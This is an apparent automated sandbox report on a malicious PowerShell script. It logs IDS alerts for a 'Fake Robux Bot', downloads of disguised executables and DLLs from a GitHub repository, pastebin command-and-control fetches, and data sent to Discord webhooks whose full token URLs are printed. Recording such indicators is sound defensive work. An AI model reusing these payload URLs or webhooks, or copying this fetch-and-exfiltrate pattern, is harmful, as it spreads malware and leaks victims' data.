Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1746099211.000002927D9A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbix source: powershell.exe, 0000000C.00000002.1746099211.000002927D9D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbo source: powershell.exe, 0000000C.00000002.1745296458.000002927D966000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89 source: powershell.exe, 0000000C.00000002.1746802564.000002927D9E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb` source: powershell.exe, 00000001.00000002.1549184232.0000026CA964F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb% source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.7:49775 -> 162.159.138.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:49889 -> 162.159.138.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:49852 -> 162.159.138.232:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49703 -> 185.199.109.133:443
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Backend.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/FH5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.com
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 215Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 300Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 300Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Backend.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/FH5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.com
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 215Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 16:08:27 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729008509x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=imyMIeHTEUKrovK9QjsYTPhziEcFHvbCRUmlHJ04Sdmlni2azLULDXKhTQkqtByBt2d%2BDgG9HPAIrcuLyL3JBGB3bLQkl2IhNuZitGsHxCfOPpeMjmsew252GVSl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=79c012eaf9029fed6f4174fc912d62fc9df2f131-1729008507; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=NRZYuviVxKznP8b._.zmL4nobhKDT8sSIL_kl3WgFCM-1729008507935-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d311165fb836c3d-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 16:08:41 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729008523x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gCDeVYfG8MOB0FTSV0UaeFLhjp7PDyjKfLCFzNYSi2LWR1vejx2IA%2FAKTlNsTQA%2BFioU%2FubTwFF92vNbWie4qWxEDWEb3XGiD%2B7wz99RzoTzgAB%2FBWI1Mjq0sZc5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=bd1d45b24ccd9896b6e9876f8b878c373fe51f19-1729008521; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=XJWZftbrpRr34.ddkGfOILwNBMWYYtEwVHX6y4K6hok-1729008521994-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3111bddf3ea915-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 16:08:49 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729008530x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bmW9a6ZzW6OZtWv4mx158Rhhm7zAR9pDtYeqopVf8louXs4yLTmZHQ3cLwwS7oNaoxDob4YR9htr06zB%2FyJ9p2MobYR1zHRVImJaIGYUR%2FPWoxMFRUpeN1GBuLjA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=0968388ccef6ec26a57a8a0fca07deaa13e0c211-1729008529; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=Zg1_cvnTkrEezowrmdGcWuRIEpyS1qc_JH3ww76STdM-1729008529315-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3111eb984d6be9-DFW
Source: powershell.exe, 00000011.00000002.1846302686.0000024098480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftp
Source: svchost.exe, 00000007.00000002.2554051222.000001F0D2E0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000001.00000002.1510210225.0000026C91D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.00000292014AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000001.00000002.1538018702.0000026CA1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.1701038367.000002920050A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200A5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.00000240807FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000011.00000002.1773538760.00000240807FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1510210225.0000026C9313B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200AF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080DE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000011.00000002.1773538760.0000024080DE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000001.00000002.1510210225.0000026C914C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080373000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1510210225.0000026C914C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.000002920005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408034C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1510210225.0000026C91D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.00000292014AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1String found in binary or memory: https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpT
Source: powershell.exe, 0000000C.00000002.1701038367.00000292014AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/129575196622756
Source: powershell.exe, 0000000C.00000002.1701038367.0000029200B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080EB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGM
Source: powershell.exe, 00000011.00000002.1773538760.0000024080EB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080EB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080E82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewv
Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000007.00000003.1367837796.000001F0D2BE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.000002920050A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.00000240807FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1538018702.0000026CA1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: powershell.exe, 0000000C.00000002.1701038367.0000029200A66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000C.00000002.1701038367.0000029200A66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200A5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000001.00000002.1510210225.0000026C93175000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Backend.dll
Source: powershell.exe, 00000001.00000002.1510210225.0000026C93175000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/FH5.exe
Source: powershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/OneDriveFileSync.dll
Source: powershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Photoshop_Set-Up.exe
Source: powershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200A9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080E16000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49810 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49821 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49852 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49889 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_7548.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7912.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7912, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Backend.dllJump to dropped file
